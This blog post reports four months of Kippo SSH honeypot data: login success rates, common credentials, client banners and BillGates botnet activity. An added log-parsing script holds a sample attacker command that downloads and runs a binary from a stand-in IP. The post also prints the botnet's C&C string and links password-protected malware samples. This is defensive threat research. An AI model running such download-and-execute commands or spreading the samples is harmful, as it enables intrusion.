Inside a Kippo honeypot: how the billgates botnet spreads

A few months ago I decided to install a honeypot to find new threats and to collect new malware to analyze. There are several honeypots I had in mind to try, but for now I have chosen Kippo.

From Kippo's homepage: "Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker." (To see all the features offered by this honeypot, consult Kippo's homepage.)

I will not dwell on the installation and the features Kippo offers, because this post is intended to be a final report with statistics and graphs after months in operation. Regarding the configuration tips and tricks that I have used, here are some links that will be very helpful in building a similar setup:

My honeypot is a sort of 'fork' of the original Kippo from desaster's GitHub repo, into which I have merged some changes to hide or improve Kippo itself: improvements such as SFTP, direct-tcpip, exec stdin logging, SSH algorithm updates and JSON logging from Michel Oosterhof's Kippo fork, all the extra commands from the kippo-extra GitHub repo, and some minor changes. Then I applied a few workarounds/patches to hide my Kippo honeypot from identification attempts.

The honeypot is located in Singapore; it was turned on 1 September 2014 and stopped on 31 December 2014, so I have collected 4 months of data. During that period, apart from the occasional visit from someone playing with nmap, I received essentially only attacks from a very specific botnet, on which I will spend a few words at the end of the post.

Data such as connections, downloads and command inputs are saved in a database and, thanks to Bruteforce Lab's Kippo-Graph script, can be viewed very comfortably in a browser.

Now let’s get into the statistics.

Honeypot activity

Success ratio

The total number of login attempts is 112467, but how many of these have been successful?

Just under 4% of logins succeeded. But why? Let's look at the usernames and passwords used to log in over SSH.

OK, some strange user/password combinations have been used, probably the result of a dictionary-based script used by the botnet. Clearly the most common attempt, 46% of the total, was made using root/admin. In fact 3644 is very close to the number of successful logins. (Keep in mind that Kippo only accepts the credentials listed in its userdb, so the success ratio measures how quickly the botnet's dictionary hits the honeypot's configured password, not anything about SSH itself.)

Now let's see which SSH clients were used to try to log in to the honeypot.

Top 10 SSH clients

PuTTY stands out clearly. Note that the client banner is a string chosen by the client, so "PuTTY" here means a client that announces itself as PuTTY, not necessarily the real program.

Let’s now analyze the human activity performed on the honeypot.

Top 10 commands

Not many sessions were used interactively by an operator (maybe they found out they were playing with a honeypot?): just 39 sessions have been recorded.
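The numbers above (success ratio, top credentials, top SSH client banners, and the count of interactive sessions with their commands) can also be reproduced straight from Kippo's plain-text log instead of the Kippo-Graph database. The script below is an added example, not code from the original post, from Kippo or from Kippo-Graph; it assumes the kippo.log line shapes for "Remote SSH version", "login attempt [user/pass] succeeded|failed" and "CMD:" lines, and runs on a constructed sample rather than on the honeypot's real data.

```python
import re
from collections import Counter

# Constructed sample of kippo.log lines (not captures from the post's honeypot).
# Three line shapes are used: the client banner, login attempts, and shell commands.
SAMPLE_LOG = """\
2014-09-01 03:12:01+0000 [HoneyPotTransport,1,203.0.113.10] Remote SSH version: SSH-2.0-PUTTY
2014-09-01 03:12:02+0000 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.10] login attempt [root/123456] failed
2014-09-01 03:12:03+0000 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.10] login attempt [root/admin] succeeded
2014-09-01 03:12:05+0000 [HoneyPotProtocol,1,203.0.113.10] CMD: uname -a
2014-09-01 03:12:06+0000 [HoneyPotProtocol,1,203.0.113.10] CMD: cat /proc/cpuinfo
2014-09-01 04:40:11+0000 [HoneyPotTransport,2,198.51.100.77] Remote SSH version: SSH-2.0-libssh2_1.4.2
2014-09-01 04:40:12+0000 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.77] login attempt [root/root] failed
2014-09-01 04:40:13+0000 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.77] login attempt [admin/admin] failed
2014-09-01 04:40:14+0000 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.77] login attempt [root/admin] succeeded
2014-09-01 05:01:30+0000 [HoneyPotTransport,3,192.0.2.44] Remote SSH version: SSH-2.0-PUTTY
2014-09-01 05:01:31+0000 [SSHService ssh-userauth on HoneyPotTransport,3,192.0.2.44] login attempt [root/toor] failed
2014-09-01 05:01:32+0000 [SSHService ssh-userauth on HoneyPotTransport,3,192.0.2.44] login attempt [root/admin] succeeded
2014-09-01 05:01:33+0000 [HoneyPotProtocol,3,192.0.2.44] CMD: uname -a
2014-09-01 05:01:40+0000 [HoneyPotProtocol,3,192.0.2.44] CMD: cd /tmp; wget http://203.0.113.99/x; chmod +x x; ./x
2014-09-01 06:15:00+0000 [HoneyPotTransport,4,192.0.2.44] Remote SSH version: SSH-2.0-PUTTY
2014-09-01 06:15:01+0000 [SSHService ssh-userauth on HoneyPotTransport,4,192.0.2.44] login attempt [oracle/oracle] failed
"""

# Assumed kippo.log formats. The password is matched greedily and the line is
# anchored on the trailing result word, so a '/' inside the password is kept.
LOGIN_RE = re.compile(
    r"\[SSHService ssh-userauth on HoneyPotTransport,(?P<sid>\d+),(?P<ip>[\d.]+)\] "
    r"login attempt \[(?P<user>[^/]*)/(?P<password>.*)\] (?P<result>succeeded|failed)$"
)
VERSION_RE = re.compile(
    r"\[HoneyPotTransport,(?P<sid>\d+),(?P<ip>[\d.]+)\] Remote SSH version: (?P<banner>.+)$"
)
CMD_RE = re.compile(r"\[HoneyPotProtocol,(?P<sid>\d+),(?P<ip>[\d.]+)\] CMD: (?P<cmd>.*)$")


def parse_kippo_log(text):
    """Aggregate one kippo.log text into the counters the post's graphs are built from."""
    stats = {
        "attempts": 0,
        "successes": 0,
        "credentials": Counter(),       # (user, password) -> number of attempts
        "clients": Counter(),           # client banner -> number of sessions
        "commands": Counter(),          # shell command -> times typed
        "interactive_sessions": set(),  # (transport id, ip) that typed at least one command
    }
    for line in text.splitlines():
        m = LOGIN_RE.search(line)
        if m:
            stats["attempts"] += 1
            stats["credentials"][(m.group("user"), m.group("password"))] += 1
            if m.group("result") == "succeeded":
                stats["successes"] += 1
            continue
        m = VERSION_RE.search(line)
        if m:
            stats["clients"][m.group("banner")] += 1
            continue
        m = CMD_RE.search(line)
        if m:
            stats["commands"][m.group("cmd")] += 1
            stats["interactive_sessions"].add((m.group("sid"), m.group("ip")))


    return stats


def success_ratio(stats):
    """Fraction of login attempts that succeeded (0.0 for an empty log)."""
    if stats["attempts"] == 0:
        return 0.0
    return stats["successes"] / stats["attempts"]


def top(counter, n=10):
    """Most common n entries of a counter, as (key, count) pairs."""
    return counter.most_common(n)


if __name__ == "__main__":
    s = parse_kippo_log(SAMPLE_LOG)
    print(f"login attempts: {s['attempts']}, successful: {s['successes']} "
          f"({success_ratio(s):.1%})")
    print("top credentials:", top(s["credentials"], 3))
    print("top clients:", top(s["clients"], 3))
    print("interactive sessions:", len(s["interactive_sessions"]))
    print("top commands:", top(s["commands"], 3))
```

Sessions are keyed by the transport counter together with the source IP, because the counter restarts when Kippo restarts; a successful login that is never followed by a CMD line (session 2 in the sample) is exactly the bot behaviour the post describes, logging in and leaving without an interactive shell.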

The large amount of data recorded by the honeypot refers to a very specific botnet: the BillGates botnet. I came to this conclusion after analyzing the IPs and samples captured by Kippo and after doing some research on Google. Here you can download the latest fresh samples captured by Kippo (30 December) (password: infected).

I uploaded just one copy of each file since there were a lot of duplicates. See below:

I preferred not to publish any file analysis because there is enough information online; in particular, the Kernelmode forum has very interesting information and links, the same information that I found by analyzing the various modules. The only things that vary are the C&C IP address, obviously (dead at the moment), and some minor code changes. In any case some modules were packed with UPX, so I have already unpacked them. These are the botnet's modules (originally named atddd and cupsdd(h); the names usually differ from version to version).

Below is some info gathered from the botnet's main module cupsdd(h):

The string decrypted with the RSA algorithm is:

v9.jack52088.com:5168:1:1: :1:698412:697896:697380

which, after being split on ':', is assigned to these parameters:

If you want to do more analysis, my version now also includes a logstash parser so you can enrich with GeoIP and load into ElasticSearch and use Kibana for graphs.

Did you find anything else interesting besides BillGates? The latest interesting findings I have are something connecting to French sites with direct-tcpip, which I don't understand yet, and something looking for 'ubnt' (Ubiquiti Networks) wifi access points.

About the BillGates botnet and the connection to French sites, I honestly don't know. I analyzed only a couple of samples (the last captured) to better understand what I had in hand, but not all the samples (about 10 GB).
BTW, it has been about 3 weeks since I turned off the server because I'm moving around, so I'm losing the latest attacks/samples.